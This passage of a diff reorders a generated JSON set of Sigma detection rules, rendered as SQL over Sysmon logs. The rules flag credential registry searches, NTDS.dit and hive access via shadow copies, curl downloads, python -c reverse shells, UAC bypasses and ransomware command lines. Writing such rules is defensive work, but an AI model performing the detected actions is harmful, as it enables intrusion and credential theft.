'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND ((Image LIKE '%\\\\poweshell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Base64%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wermgr_susp_child_process.yml" + "filename": "proc_creation_win_susp_appx_execution.yml" }, { - "title": "Suspicious RunAs-Like Flag Combination", - "id": "50d66fb0-03f8-4da0-8add-84e77d12a020", + "title": "Computer System Reconnaissance Via Wmic.EXE", + "id": "9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f", "status": "experimental", - "description": "Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of wmic utility with the \"computersystem\" flag in order to obtain information about the machine such as the domain, username, model, etc.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation" + "attack.discovery", + "attack.execution", + "attack.t1047" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -u system %' ESCAPE '\\' OR CommandLine LIKE '% --user system %' ESCAPE '\\' OR CommandLine LIKE '% -u NT%' ESCAPE '\\' OR CommandLine LIKE '% -u \"NT%' ESCAPE '\\' OR CommandLine LIKE '% -u ''NT%' ESCAPE '\\' OR CommandLine LIKE '% --system %' ESCAPE '\\' OR CommandLine LIKE '% -u administrator %' ESCAPE '\\') AND (CommandLine LIKE '% -c cmd%' ESCAPE '\\' OR CommandLine LIKE '% -c \"cmd%' ESCAPE '\\' OR CommandLine LIKE '% -c powershell%' ESCAPE '\\' OR CommandLine LIKE '% -c \"powershell%' ESCAPE '\\' OR CommandLine LIKE '% --command cmd%' ESCAPE '\\' OR CommandLine LIKE '% --command powershell%' ESCAPE '\\' OR CommandLine LIKE '% -c whoami%' ESCAPE '\\' OR CommandLine LIKE '% -c wscript%' ESCAPE '\\' OR CommandLine LIKE '% -c cscript%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%computersystem%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_privilege_escalation_cli_patterns.yml" + "filename": "proc_creation_win_wmic_recon_computersystem.yml" }, { - "title": "Potential Product Class Reconnaissance Via Wmic.EXE", - "id": "e568650b-5dcd-4658-8f34-ded0b1e13992", - "status": "experimental", - "description": "Detects the execution of WMIC in order to get a list of firewall and antivirus products", - "author": "Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community", + "title": "Outlook EnableUnsafeClientMailRules Setting Enabled", + "id": "55f0a3a1-846e-40eb-8273-677371b8d912", + "status": "test", + "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1047", - "car.2016-03-002" + "attack.t1059", + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%AntiVirusProduct%' ESCAPE '\\' OR CommandLine LIKE '%FirewallProduct%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_recon_product_class.yml" + "filename": "proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml" }, { - "title": "Password Protected Compressed File Extraction Via 7Zip", - "id": "b717b8fd-6467-4d7d-b3d3-27f9a463af77", + "title": "Service StartupType Change Via PowerShell Set-Service", + "id": "62b20d44-1546-4e61-afce-8e175eb9473c", "status": "experimental", - "description": "Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files.", + "description": "Detects the use of the PowerShell \"Set-Service\" cmdlet to change the startup type of a service to \"disabled\" or \"manual\"", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.execution", + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate activity is expected since extracting files with a password can be common in some environement." + "False positives may occur with troubleshooting scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (Image LIKE '%\\\\7z.exe' ESCAPE '\\' OR Image LIKE '%\\\\7zr.exe' ESCAPE '\\' OR Image LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '% -p%' ESCAPE '\\' AND CommandLine LIKE '% x %' ESCAPE '\\' AND CommandLine LIKE '% -o%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR OriginalFileName = 'PowerShell.EXE') AND (CommandLine LIKE '%Set-Service%' ESCAPE '\\' AND CommandLine LIKE '%-StartupType%' ESCAPE '\\' AND (CommandLine LIKE '%Disabled%' ESCAPE '\\' OR CommandLine LIKE '%Manual%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_7zip_password_extraction.yml" + "filename": "proc_creation_win_powershell_set_service_disabled.yml" }, { - "title": "Monitoring Winget For LOLbin Execution", - "id": "313d6012-51a0-4d93-8dfc-de8553239e25", - "status": "experimental", - "description": "Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them without touching disk. The manifest option enables you to install an application by passing in a YAML file directly to the client. Winget can be used to download and install exe's, msi, msix files later.", - "author": "Sreeman, Florian Roth (Nextron Systems), Frack113", + "title": "Potential Reconnaissance Activity Via GatherNetworkInfo.VBS", + "id": "575dce0c-8139-4e30-9295-1ee75969f7fe", + "status": "test", + "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine", + "author": "blueteamer8699", "tags": [ - "attack.defense_evasion", + "attack.discovery", "attack.execution", - "attack.t1059" + "attack.t1615", + "attack.t1059.005" ], "falsepositives": [ - "Admin activity installing packages not in the official Microsoft repo. Winget probably won't be used by most users." + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND CommandLine LIKE '%install%' ESCAPE '\\' AND (CommandLine LIKE '%-m %' ESCAPE '\\' OR CommandLine LIKE '%--manifest%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR OriginalFileName IN ('cscript.exe', 'wscript.exe')) AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_execution_via_winget.yml" + "filename": "proc_creation_win_lolbin_gather_network_info.yml" }, { - "title": "Enumeration for Credentials in Registry", - "id": "e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1", + "title": "UAC Bypass Using Event Viewer RecentViews", + "id": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", "status": "test", - "description": "Adversaries may search the Registry on compromised systems for insecurely stored credentials.\nThe Windows Registry stores configuration information that can be used by the system or other programs.\nAdversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services\n", - "author": "frack113", + "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.002" + "attack.defense_evasion", + "attack.privilege_escalation" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\Event Viewer\\\\RecentViews%' ESCAPE '\\' OR CommandLine LIKE '%\\\\EventV~1\\\\RecentViews%' ESCAPE '\\') AND CommandLine LIKE '%>%' ESCAPE '\\')" + ], + "filename": "proc_creation_win_uac_bypass_eventvwr_recentviews.yml" + }, + { + "title": "WMI Backdoor Exchange Transport Agent", + "id": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", + "status": "test", + "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event filters", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1546.003" ], "falsepositives": [ "Unknown" ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\EdgeTransport.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Bin\\\\OleConverter.exe' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" + }, + { + "title": "Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)", + "id": "2afafd61-6aae-4df4-baed-139fa1f4c345", + "status": "test", + "description": "Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)", + "author": "Thomas Patzke", + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ], + "falsepositives": [ + "NTDS maintenance" + ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '% query %' ESCAPE '\\' AND CommandLine LIKE '%/t %' ESCAPE '\\' AND CommandLine LIKE '%REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/s%' ESCAPE '\\') AND ((CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%HKLM%' ESCAPE '\\') OR (CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%HKCU%' ESCAPE '\\') OR CommandLine LIKE '%HKCU\\\\Software\\\\SimonTatham\\\\PuTTY\\\\Sessions%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ntdsutil.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_enumeration_for_credentials_in_registry.yml" + "filename": "proc_creation_win_ntdsutil_usage.yml" }, { - "title": "Suspicious Curl.EXE Download", - "id": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", - "status": "experimental", - "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", + "title": "Suspicious Process Created Via Wmic.EXE", + "id": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", + "status": "test", + "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\", etc.", "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.t1047" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND ((CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\' OR CommandLine LIKE '%.vbe' ESCAPE '\\' OR CommandLine LIKE '%.vbs' ESCAPE '\\'))) AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--silent --show-error --output %' ESCAPE '\\' AND CommandLine LIKE '%gfw-httpget-%' ESCAPE '\\' AND CommandLine LIKE '%AppData%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%call %' ESCAPE '\\' AND CommandLine LIKE '%create %' ESCAPE '\\' AND (CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_curl_susp_download.yml" + "filename": "proc_creation_win_wmic_susp_process_creation.yml" }, { - "title": "Pubprn.vbs Proxy Execution", - "id": "1fb76ab8-fa60-4b01-bddd-71e89bf555da", - "status": "experimental", - "description": "Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.", - "author": "frack113", + "title": "DarkSide Ransomware Pattern", + "id": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c", + "status": "test", + "description": "Detects DarkSide Ransomware and helpers", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.execution", + "attack.t1204" + ], + "falsepositives": [ + "Unknown", + "UAC bypass method used by other malware" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%=[char][byte](''0x''+%' ESCAPE '\\' OR CommandLine LIKE '% -work worker0 -path %' ESCAPE '\\') OR (ParentCommandLine LIKE '%DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_malware_darkside_ransomware.yml" + }, + { + "title": "Abusing Print Executable", + "id": "bafac3d6-7de9-4dd9-8874-4a1194b493ed", + "status": "test", + "description": "Attackers can use print.exe for remote file copy", + "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", "tags": [ "attack.defense_evasion", - "attack.t1216.001" + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\pubprn.vbs%' ESCAPE '\\' AND CommandLine LIKE '%script:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\print.exe' ESCAPE '\\' AND CommandLine LIKE 'print%' ESCAPE '\\' AND CommandLine LIKE '%/D%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\') AND NOT (CommandLine LIKE '%print.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_pubprn.yml" + "filename": "proc_creation_win_print_remote_file_copy.yml" }, { - "title": "Add New Windows Capability - ProcCreation", - "id": "b36d01a3-ddaf-4804-be18-18a6247adfcd", + "title": "Python Inline Command Execution", + "id": "899133d5-4d7c-4a7f-94ee-27355c879d90", "status": "experimental", - "description": "Detects usage of the \"Add-WindowsCapability\" cmdlet to add new windows capabilities. Notable capabilities could be \"OpenSSH\" and others.", + "description": "Detects execution of python using the \"-c\" flag. This is could be used as a way to launch a reverse shell or execute live python code.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate usage of the capabilities by administartors or users. Filter accordingly" + "Python libraries that use a flag starting with \"-c\". Filter according to your environment" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-WindowsCapability%' ESCAPE '\\' AND CommandLine LIKE '%OpenSSH.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((OriginalFileName = 'python.exe' OR (Image LIKE '%python.exe' ESCAPE '\\' OR Image LIKE '%python3.exe' ESCAPE '\\' OR Image LIKE '%python2.exe' ESCAPE '\\')) AND CommandLine LIKE '% -c%' ESCAPE '\\') AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Python%' ESCAPE '\\' AND ParentImage LIKE '%\\\\python.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-E -s -m ensurepip -U --default-pip%' ESCAPE '\\') OR (ParentImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_add_windows_capability.yml" + "filename": "proc_creation_win_python_inline_command_execution.yml" }, { - "title": "Stop Windows Service Via Sc.EXE", - "id": "81bcb81b-5b1f-474b-b373-52c871aaa7b1", + "title": "PUA - Crassus Execution", + "id": "2c32b543-1058-4808-91c6-5b31b8bed6c5", "status": "experimental", - "description": "Detects the stopping of a Windows service", - "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Crassus a windows privilege escalation discovery tool based on PE metadata characteristics.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.discovery", + "attack.t1590.001" ], "falsepositives": [ - "There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly" + "Unlikely" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((OriginalFileName = 'sc.exe' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\') AND CommandLine LIKE '% stop %' ESCAPE '\\') AND NOT ((CommandLine IN ('sc stop KSCWebConsoleMessageQueue', 'sc stop LGHUBUpdaterService') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Crassus.exe' ESCAPE '\\' OR OriginalFileName = 'Crassus.exe' OR Description LIKE '%Crassus%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sc_stop_service.yml" + "filename": "proc_creation_win_pua_crassus.yml" }, { - "title": "Disabled IE Security Features", - "id": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", - "status": "test", - "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features", - "author": "Florian Roth (Nextron Systems)", + "title": "Sensitive Registry Access via Volume Shadow Copy", + "id": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", + "status": "experimental", + "description": "Detects a command that accesses password storing registry hives via volume shadow backups", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Some rare backup scenarios" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% -name IEHarden %' ESCAPE '\\' AND CommandLine LIKE '% -value 0 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DEPOff %' ESCAPE '\\' AND CommandLine LIKE '% -value 1 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DisableFirstRunCustomize %' ESCAPE '\\' AND CommandLine LIKE '% -value 2 %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\NTDS.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SECURITY%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\tmp\\\\log%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_disable_ie_features.yml" + "filename": "proc_creation_win_malware_conti_shadowcopy.yml" }, { - "title": "MERCURY APT Activity", - "id": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d", + "title": "Rundll32 With Suspicious Parent Process", + "id": "1723e720-616d-4ddc-ab02-f7e3685a4713", "status": "experimental", - "description": "Detects suspicious command line patterns seen being used by MERCURY APT", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious start of rundll32.exe with a parent process of Explorer.exe. Variant of Raspberry Robin, as first reported by Red Canary.", + "author": "CD_ROM_", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.g0069" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-exec bypass -w 1 -enc%' ESCAPE '\\' AND CommandLine LIKE '%UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '% -localserver 22d8c27b-47a1-48d1-ad08-7da7abd79617' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_mercury.yml" + "filename": "proc_creation_win_rundll32_parent_explorer.yml" }, { - "title": "AADInternals PowerShell Cmdlets Execution - ProccessCreation", - "id": "c86500e9-a645-4680-98d7-f882c70c1ea3", + "title": "Potential CVE-2022-29072 Exploitation Attempt", + "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3", "status": "experimental", - "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", - "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability.\n7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow.\nThe command runs in a child process under the 7zFM.exe process.\n", + "author": "frack113", "tags": [ "attack.execution", - "attack.reconnaissance", - "attack.discovery", - "attack.credential_access", - "attack.impact" + "cve.2022.29072" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Disable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Enable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Export-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Get-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Grant-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Install-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Join-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%New-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Open-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Read-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Register-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Remove-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Restore-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Search-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Send-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Set-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Start-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Update-AADInt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ParentImage LIKE '%\\\\7zFM.exe' ESCAPE '\\') AND NOT (((CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\')) OR (CommandLine = '')))" ], - "filename": "proc_creation_win_powershell_aadinternals_cmdlets_execution.yml" + "filename": "proc_creation_win_exploit_cve_2022_29072_7zip.yml" }, { - "title": "HackTool - SILENTTRINITY Stager Execution", - "id": "03552375-cc2c-4883-bbe4-7958d5a980be", - "status": "test", - "description": "Detects SILENTTRINITY stager use via PE metadata", - "author": "Aleksey Potapov, oscd.community", - "tags": [ - "attack.command_and_control", - "attack.t1071" - ], + "title": "PUA - AdvancedRun Suspicious Execution", + "id": "fa00b701-44c6-4679-994d-5a18afa8a707", + "status": "experimental", + "description": "Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE 